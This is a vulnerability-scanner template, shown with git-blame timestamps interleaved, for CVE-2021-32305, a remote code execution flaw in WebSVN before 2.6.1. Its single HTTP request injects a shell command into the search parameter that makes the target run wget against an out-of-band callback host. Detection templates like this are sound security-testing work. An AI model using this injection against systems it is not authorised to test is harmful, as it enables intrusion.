2021-07-27 00:24:35 +00:00
|
|
|
id: CVE-2021-32305
|
|
|
|
|
|
|
|
info:
|
2022-05-18 20:58:07 +00:00
|
|
|
name: Websvn <2.6.1 - Remote Code Execution
|
2021-07-27 00:24:35 +00:00
|
|
|
author: gy741
|
|
|
|
severity: critical
|
2022-04-22 10:38:41 +00:00
|
|
|
description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
|
2021-08-19 13:59:12 +00:00
|
|
|
reference:
|
2021-07-27 00:24:35 +00:00
|
|
|
- https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/websvnphp/websvn/pull/142
|
|
|
|
- http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
|
2022-05-18 20:58:07 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-32305
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2021-32305
|
|
|
|
cwe-id: CWE-78
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.97295
|
2023-04-12 10:55:48 +00:00
|
|
|
cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: websvn
|
|
|
|
product: websvn
|
|
|
|
tags: cve,cve2021,websvn,rce,oast,packetstorm
|
2021-07-27 00:24:35 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-07-27 00:24:35 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
Accept: */*
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
2021-07-27 00:24:35 +00:00
|
|
|
words:
|
|
|
|
- "http"
|